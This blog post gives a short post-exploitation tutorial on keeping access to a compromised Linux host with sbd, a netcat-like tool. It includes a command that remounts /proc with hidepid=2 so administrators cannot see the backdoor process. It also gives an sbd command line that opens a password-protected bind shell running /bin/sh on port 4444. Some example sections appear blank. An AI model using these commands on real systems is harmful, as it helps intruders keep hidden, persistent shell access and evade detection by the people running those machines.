Saturday, July 11, 2015

Maintaining Access With sbd

sbd is a program similar to netcat that allows one to read and write to TCP sockets.  sbd is fully portable and is available Windows and Unix/Linux operating systems.

In this post I will show how after one gains privileged access to a system they can maintain access using sbd. I will also illustrate some of the pitfalls of using tools like sbd.

After compromising an account that has sudo rights remount the proc file system as follows :

sudo mount -o remount,rw,hidepid=2 /proc
 
This command will remount the proc file system and preclude users from accessing /proc and /proc/PID.  This will hide all processes from users except ones they own.  A unobservant administrator may not notice this at first when logging in under their own account. 

Note that this option is only available under Linux kernels 3.2+.  Also, root will still be able to see all processes.

Next run sbd.  An example of possible options are:

sbd - l-c on -k password -vv -n -e /bin/sh -p 4444

-c on : encryption on
-k password : enable password authentication where password is the password
-vv : verbose
-n : disable name resolution
-e : execute program on connection
-p port : listen on port
-l : listen for connections

As the following examples show, the process is hidden from the non-privileged user, but the ss command still shows the host is listening on port 4444.












From the other host you can initiate the connection as follows :



This method of maintaining access is simple but not very robust as sbd can still be discovered via the netstat and ss commands.  Also, note that a bind shell was used in this example, so the port used must be opened on any firewalls.  A reverse shell would be better suited for this case.